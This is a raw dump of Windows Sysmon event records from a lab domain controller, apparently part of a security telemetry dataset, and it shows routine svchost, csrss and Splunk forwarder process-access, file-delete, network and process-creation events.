13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201531Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201530Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201529Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201528Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201527Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201526Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201525Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201524Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201523Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201522Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201521Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201520Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201519Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201518Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201517Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201516Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:11.197{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201551Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:12.465{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9816442872E934A17A73F79BBE134EE,SHA256=D492ABDE6E0A2AEC585D8E15BF5982BA30E1A066FD46ACA173E8E9A5924DE22D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201552Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:13.700{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EFB0B4B51B0035FF17751C79F4A8455,SHA256=281EBC1C8C2CB7F35A4A7CA30739547B6C827CD38B9319A794C80150EB7FFCA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201553Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:14.731{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CD67E7A2971F9DC2010A7AFBB023DCE,SHA256=7AA3D6466B58EC5751772F4FD8261DF92E29DFCA15A03F38F27B8F029AE7E14D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201556Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:12.005{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55226-false10.0.1.12-8000- 23542300x80000000000000002201555Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:15.747{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98DF128EA589EFA931C799514039AF45,SHA256=032EF13B793028BD4409F562C1127E8374831A020FD91EADBCFCC942C7EC7E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201554Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:15.325{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7D4219F65A751B316C5F30CB53CB0A7,SHA256=1601C671C7235A8D5C441ED4905F972FA489077DD8581D9E53FB5C62224E8B66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201557Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:16.762{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F74598A11AB9A1C904D4E1E7B424891,SHA256=7DCFD8B8B57FD667552D12644416B77184DCED2E6AE7A2A0005A2124CCF0AC3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201566Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.778{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE414D1D7F5B0EB33999828B66A6C300,SHA256=B8DAC26E159F98744CB614F2515778F3839390CDAC7AC58049BDEEB40DE11CB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201565Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7B5-6040-054E-00000000AD01}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201564Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201563Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201562Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201561Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201560Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7B5-6040-054E-00000000AD01}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201559Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.559{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7B5-6040-054E-00000000AD01}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201558Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:17.560{5ABCFE62-E7B5-6040-054E-00000000AD01}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201586Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.918{5ABCFE62-E7B6-6040-074E-00000000AD01}48766220C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201585Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.887{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 